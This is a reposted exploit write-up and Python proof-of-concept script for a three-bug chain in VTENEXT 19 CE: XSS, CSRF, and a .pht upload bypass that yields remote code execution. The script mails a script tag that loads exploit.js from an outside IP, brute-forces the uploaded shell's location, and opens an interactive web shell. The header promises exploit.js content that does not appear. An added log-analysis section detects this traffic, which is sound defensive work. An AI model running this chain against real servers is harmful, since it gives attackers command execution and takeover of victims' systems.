VTENEXT 19 CE - Remote Code Execution Vulnerability - Hack之路

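VTENEXT 19 CE - Remote Code Execution
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed the vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE: N/A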

# 2020/03/07 - Vulnerabilities disclosed to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

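# This script should be easy enough to follow.

# We chain three vulnerabilities together to get RCE.

# XSS - The "From" field of the VTENEXT Messages module is vulnerable.

# File upload - File extensions are checked against $Upload_badext in the config file. The .pht extension is allowed and executable by default.

# CSRF - No CSRF protection.

# exploit.js needs to be hosted somewhere, and the IP needs to be replaced

# check_csrf() should be changed based on your setup

# run_shell() is a "nice to have"

# Content of exploit.js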

import smtplib
import datetime
import requests
import os
import time
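print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")

# Placeholder, not given on the page: base URL of the vtenext instance in the test lab (trailing slash required).
base_url = "http://vtenext.lab.example/"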
def build_url():
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)
def build_mail():
    _from    = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to      = "admin@example.com"
    _subject = "Important!"
    _body    = "While you're reading this, a file is being uploaded to this server."
    msg  = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg
def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port   = 25
    sender   = 'user1@lab.local'
    receiver = 'admin@lab.local'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)
def check_csrf():
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue
def find_shell():
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue
def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
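
A detection-side view of the traffic this script produces, as an added example that is not part of the original post or of the vtenext project: it scans Apache combined-format access log lines for requests to PHP-handled extensions under storage/ and for a single client probing many attachment ids, which is what find_shell() does. The sample log lines, IP addresses, extension list and threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Extensions often mapped to the PHP handler (assumed list; align it with your Apache/PHP config).
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "pht", "phtml", "phar"}
# Combined Log Format: client, identity, user, [time], "METHOD URI PROTO", status, ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Upload layout shown on the page: storage/home/<id>/<year>/<Month>/week<N>/<n>_<name>.<ext>
UPLOAD_RE = re.compile(r'/storage/(?:.*/)?(\d+)_[^/?]+\.(\w+)(\?.*)?$')

def analyze(lines, enum_threshold=20):
    """Return (executed, enumerators): 200 responses for script files under
    storage/, and clients that requested many distinct attachment ids."""
    executed, probes = [], defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, uri, status = m.groups()
        u = UPLOAD_RE.search(uri)
        if not u or u.group(2).lower() not in PHP_EXTS:
            continue  # ordinary attachment (pdf, jpg, ...) or unrelated path
        probes[client].add(int(u.group(1)))
        if status == "200":
            executed.append((client, uri))  # an uploaded script was served
    enumerators = sorted(c for c, ids in probes.items() if len(ids) >= enum_threshold)
    return executed, enumerators

def sample_log():
    """Constructed log lines: 41 misses, then hits on id 42, plus one benign download."""
    base = "/vtenext/storage/home/1/2020/September/week1/"
    fmt = '{ip} - - [09/Sep/2020:10:00:{s:02d} +0000] "GET {uri} HTTP/1.1" {st} 512 "-" "python-requests/2.24"'
    lines = [fmt.format(ip="203.0.113.7", s=i % 60, uri=f"{base}{i}_shell.pht", st=404) for i in range(1, 42)]
    lines.append(fmt.format(ip="203.0.113.7", s=50, uri=f"{base}42_shell.pht", st=200))
    lines.append(fmt.format(ip="203.0.113.7", s=51, uri=f"{base}42_shell.pht?x=id", st=200))
    lines.append(fmt.format(ip="198.51.100.5", s=52, uri=f"{base}7_report.pdf", st=200))
    return lines

if __name__ == "__main__":
    hits, scanners = analyze(sample_log())
    for client, uri in hits:
        print("script served from upload directory:", client, uri)
    print("clients enumerating attachment ids:", scanners)
```

Any entry in the first list means the web server is serving files from the upload directory through the PHP handler, so the extension blocklist and the handler mapping for storage/ both need review.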

Website: https://www.hackzl.cn; Publisher: hack之路. Please credit the source when reposting: https://www.hackzl.cn/index.php/2020/09/12/vtenext-19-ce-%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/
